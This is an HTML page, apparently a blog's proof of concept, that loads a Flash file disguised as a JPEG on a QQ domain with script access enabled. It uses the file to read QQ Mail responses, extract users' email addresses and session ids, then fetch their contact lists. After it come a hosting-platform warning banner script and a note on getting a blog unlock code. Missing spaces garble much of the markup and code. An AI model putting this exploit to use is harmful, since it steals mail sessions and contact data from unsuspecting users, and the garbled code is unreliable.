<html> <head> <title>just for fun</title> <script> var test = 1; var sid; var uid; var resultCon = ''; functionsendToJavaScript(strData){ regexp = newRegExp(/([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+/g); if ((result = regexp.exec(strData)) != null) { resultCon = resultCon + 'users: ' + result[0] + '<br />'; while ((result = regexp.exec(strData)) != null) { resultCon = resultCon + 'users: ' + result[0] + '<br />'; } document.write(resultCon); } // 匹配 SID var r1 = strData.match(/subtemplate=ill&sid=(.*?)&/); if (r1 != null) { sid = r1[1]; resultCon = resultCon + 'sid: ' + sid + '<br />'; if (test == 1) { var theDiv = document.getElementById("havefun"); var content = document.createTextNode(""); theDiv.appendChild(content); theDiv.innerHTML += '<objectid="myObject"width="100"height="100"allowscriptaccess="always"type="application/x-shockwave-flash"data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg"><paramname="AllowScriptAccess"value="always"><paramname="flashvars"value="input=http://set1.mail.qq.com/cgi-bin/laddr_lastlist?sid=' + sid + '%26t=addr_datanew%26category=hot"></object>'; } test++; } } </script> </head>
<body> just for fun <divid=havefun></div> <objectid="myObject"width="100"height="100"allowscriptaccess="always"type="application/x-shockwave-flash" data="http://join.qq.com/upload/photo/150914/439a57750ce65071b5cdbdaf0ce3bb7e.jpg"> <paramname="AllowScriptAccess"value="always"> <paramname="flashvars" value="input=http://mail.qq.com/cgi-bin/mail_spam?action=check_link%26url=http://www.baidu.com"> </object> </body>
</html>
<scripttype="text/javascript"> //立即运行的匿名函数 !function(){ var closed = false,bdiv; var charset = document.charset || document.characterSet; var utf8 = ['该页面的提供者尚未完成', '实名认证', '您的访问可能存在风险']; var gbk = ['??ҳ????ṩ????δ???', 'ʵ????֤', '???ķ??ʿ??ܴ??ڷ???']; var en = ['The provider of this page is not', 'verified', 'there are risks when you visiting']; functionbanner(){ var char = charset.toLowerCase(), lang = ''; switch (true) { case char.indexOf('utf') == 0: lang = utf8; break; case char.indexOf('gb') == 0: lang = gbk; break; default: lang = en; } var _div = '<divstyle="position:fixed;_position:absolute;top:0;left:0;right:0;padding:12px;background-color:rgba(0,0,0,0.5);filter: progid:DXImageTransform.Microsoft.gradient(startcolorstr=#7F000000,endcolorstr=#7F000000);color:#fff;text-align:center;font-size:16px;font-family:simsun,serif;cursor:default;z-index:2147483647;"><pstyle="margin:0;padding:0;">' + lang[0] + ' <astyle="text-decoration:none;color:#37afe4;"target="_blank"href="http://sae.sina.com.cn/?m=faq&a=view&doc_id=22">' + lang[1] + '</a> ' + lang[2] + '</p><astyle="position:absolute;right:12px;top:50%;font-size:20px;color:#fff;border:none;margin:0;padding:0;;margin-top:-10px;line-height:20px;background:none;cursor:pointer;font-family:Helvetica Neue, Helvetica, Arial, sans-serif;outline:none;">x</a></div>', div = document.createElement('div'); div.innerHTML = _div; var close = div.getElementsByTagName('a')[1], x = 0, y = 0; close.onmouseover = function(event){ var e = event ? event : window.event; x = e.clientX; y = e.clientY; }; close.onclick = function(event){ if (event && !event.initMouseEvent) { return } var e = event ? event : window.event; if (Math.abs(e.clientX - x) < 10 && Math.abs(e.clientY - y) < 10) { div.style.display = 'none'; closed = true; } }; return div } functiont(){ if (closed) { clearInterval(tt); return } if (bdiv && bdiv.parentNode) { bdiv.parentNode.removeChild(bdiv) } bdiv = banner(); document.body.appendChild(bdiv); } t(); var tt = setInterval(t, 5000); }(); </script>
方式1.请访问本博主的B站【WeiyiGeek】首页关注UP主, 将自动随机获取解锁验证码。
Method 2.Please visit 【My Twitter】. There is an article verification code in the homepage.
方式3.扫一扫下方二维码,关注本站官方公众号
回复:验证码
将获取解锁(有效期7天)本站所有技术文章哟!